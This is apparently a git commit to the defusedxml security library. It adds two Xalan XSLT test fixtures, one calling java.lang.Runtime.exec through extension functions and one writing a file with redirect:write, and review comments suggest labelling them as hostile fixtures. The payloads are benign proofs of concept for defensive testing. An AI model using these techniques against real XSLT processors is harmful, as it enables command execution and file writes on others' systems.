authorChristian Heimes <christian@cheimes.de>2013-03-07 22:03:36 +0100
committerChristian Heimes <christian@cheimes.de>2013-03-07 22:03:36 +0100
commitfb7ba65f46a11b2e230f0fba9497aa8268a6e6b6 (patch)
tree48e6fc95b61ef2feaed897abcd25826fb0d7e33e
parentb420d4338f2a1daab7c9d89b8bb696b988993f9e (diff)
downloaddefusedxml-fb7ba65f46a11b2e230f0fba9497aa8268a6e6b6.tar.gz
add two working xalan exploits
-rw-r--r--xmltestdata/xalan_exec.xsl20
-rw-r--r--xmltestdata/xalan_write.xsl18
2 files changed, 38 insertions, 0 deletions
diff --git a/xmltestdata/xalan_exec.xsl b/xmltestdata/xalan_exec.xsl
new file mode 100644
index 0000000..b06c59a
--- /dev/null
+++ b/xmltestdata/xalan_exec.xsl
@@ -0,0 +1,20 @@
+<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on
+ OpenJDK 1.7.0_15
+
+ $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \
+ org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_exec.xsl
+-->
+<xsl:stylesheet version="1.0"
+ xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+ xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
+ xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
+ exclude-result-prefixes="rt ob">
+ <xsl:template match="/">
+ <xsl:variable name="runtimeObject" select="rt:getRuntime()"/>
+ <xsl:variable name="command"
+ select="rt:exec($runtimeObject, &apos;/usr/bin/notify-send SomethingBadHappensHere&apos;)"/>
+ <xsl:variable name="commandAsString" select="ob:toString($command)"/>
+ <xsl:value-of select="$commandAsString"/>
+ </xsl:template>
+</xsl:stylesheet>
+
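Review bot: The header comment records the toolchain and command line, but it never says that this stylesheet is a deliberately hostile fixture or what a run looks like when the extension call is refused. The template binds `java.lang.Runtime` through the Xalan Java extension namespace and calls `rt:exec` on `/usr/bin/notify-send`. On a host without that binary the call presumably just fails, and a test cannot tell that apart from a mitigation that worked. I would extend the comment with something like `Hostile fixture: load only from tests that verify Java extension functions are disabled (e.g. a TransformerFactory with XMLConstants.FEATURE_SECURE_PROCESSING set); a hardened run must fail with an error instead of printing the Process object.` How completely Xalan 2.7.1 honours that feature is not visible here and should be confirmed against the version under test.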
diff --git a/xmltestdata/xalan_write.xsl b/xmltestdata/xalan_write.xsl
new file mode 100644
index 0000000..56d35b9
--- /dev/null
+++ b/xmltestdata/xalan_write.xsl
@@ -0,0 +1,18 @@
+<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on
+ OpenJDK 1.7.0_15
+
+ $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \
+ org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_write.xsl
+-->
+<xsl:stylesheet version="1.0"
+ xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+ xmlns:redirect="http://xml.apache.org/xalan/redirect"
+ extension-element-prefixes="redirect">
+ <xsl:output omit-xml-declaration="yes" indent="yes"/>
+ <xsl:template match="/">
+ <redirect:write file="xalan_redirect.txt" method="text">
+ <xsl:text>Something bad happens here!&#13;</xsl:text>
+ </redirect:write>
+ </xsl:template>
+</xsl:stylesheet>
+
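Review bot: `<redirect:write file="xalan_redirect.txt" method="text">` takes a relative path, and the header comment does not say where the file lands or that a test has to check for it and clean it up. The path is presumably resolved against the working directory or the transform's output location, so a stale `xalan_redirect.txt` from an earlier vulnerable run could make a later hardened run look like a failure. I would add a line to the comment such as `Hostile fixture: a vulnerable processor creates xalan_redirect.txt; tests must delete it beforehand and assert it is absent after a hardened run.` As a smaller style point, `&#13;` is a bare carriage return; if a line ending was intended, `&#10;` is the usual choice.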